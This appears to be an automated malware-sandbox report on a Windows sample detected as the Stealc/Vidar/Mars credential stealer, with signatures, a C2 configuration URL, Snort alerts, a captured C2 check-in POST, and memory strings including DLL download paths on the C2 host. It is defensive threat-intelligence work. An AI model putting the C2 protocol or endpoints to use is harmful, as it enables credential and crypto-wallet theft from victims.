Edit tour

Windows Analysis Report
i3NmF0obCm.exe

Overview

General Information

Sample name:	i3NmF0obCm.exe renamed because original name is a hash value
Original sample name:	253ccac8a47b80287f651987c0c779ea.exe
Analysis ID:	1465851
MD5:	253ccac8a47b80287f651987c0c779ea
SHA1:	11db405849dbaa9b3759de921835df20fab35bc3
SHA256:	262a400b339deea5089433709ce559d23253e23d23c07595b515755114147e2f
Tags:	32exetrojan
Infos:

Detection

Mars Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

PE file has a writeable .text section

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

i3NmF0obCm.exe (PID: 6304 cmdline: "C:\Users\user\Desktop\i3NmF0obCm.exe" MD5: 253CCAC8A47B80287F651987C0C779EA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://40.86.87.10/108e010e8f91c38c.php"}

Threatname: Vidar

{"C2 url": "http://40.86.87.10/108e010e8f91c38c.php"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
i3NmF0obCm.exe	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
i3NmF0obCm.exe	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
Process Memory Space: i3NmF0obCm.exe PID: 6304	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: i3NmF0obCm.exe PID: 6304	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: i3NmF0obCm.exe PID: 6304	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.binstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.i3NmF0obCm.exe.ee0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.i3NmF0obCm.exe.ee0000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.0.i3NmF0obCm.exe.ee0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.0.i3NmF0obCm.exe.ee0000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security

Snort Signatures

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.4 - Destination IP: 40.86.87.10

Timestamp:	07/02/24-07:30:59.142233
SID:	2044243
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 40.86.87.10 - Destination IP: 192.168.2.4

Timestamp:	07/02/24-07:31:00.731966
SID:	2051831
Source Port:	80
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.4 - Destination IP: 40.86.87.10

Timestamp:	07/02/24-07:31:00.341853
SID:	2044246
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.4 - Destination IP: 40.86.87.10

Timestamp:	07/02/24-07:30:59.953582
SID:	2044244
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 - Source IP: 40.86.87.10 - Destination IP: 192.168.2.4

Timestamp:	07/02/24-07:31:00.340102
SID:	2051828
Source Port:	80
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 40.86.87.10Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 42 39 43 32 32 31 34 42 44 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 5a 4f 56 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"5B9C2214BD8B2768236643------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"ZOV------HDGIJJDGCBKFIDHIEBKE--

Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php%
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php(
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php-LTC
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php2
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php9
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php976cbc684762e42ee25308426ba0ad93
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php:
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpI
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpe
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpirefox
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phposition:
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpv
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php~
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/freebl3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/freebl3.dll$
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/freebl3.dll:
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/mozglue.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/mozglue.dllL
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/mozglue.dllv
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1880536045.0000000027931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/msvcp140.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllQ
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllllU
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllowser
Source: i3NmF0obCm.exe, 00000000.00000002.1880536045.0000000027931000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/softokn3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1880536045.0000000027931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/softokn3.dllJtx
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/sqlite3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/vcruntime140.dll
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: i3NmF0obCm.exe, i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883712196.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: GCGDGHCB.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: GCGDGHCB.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ep
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.epnacl
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: GCGDGHCB.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GCGDGHCB.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GCGDGHCB.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://support.mozilla.org
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp, i3NmF0obCm.exe, 00000000.00000003.1724627062.000000002185D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp, i3NmF0obCm.exe, 00000000.00000003.1724627062.000000002185D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: GCGDGHCB.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/eBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VS
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
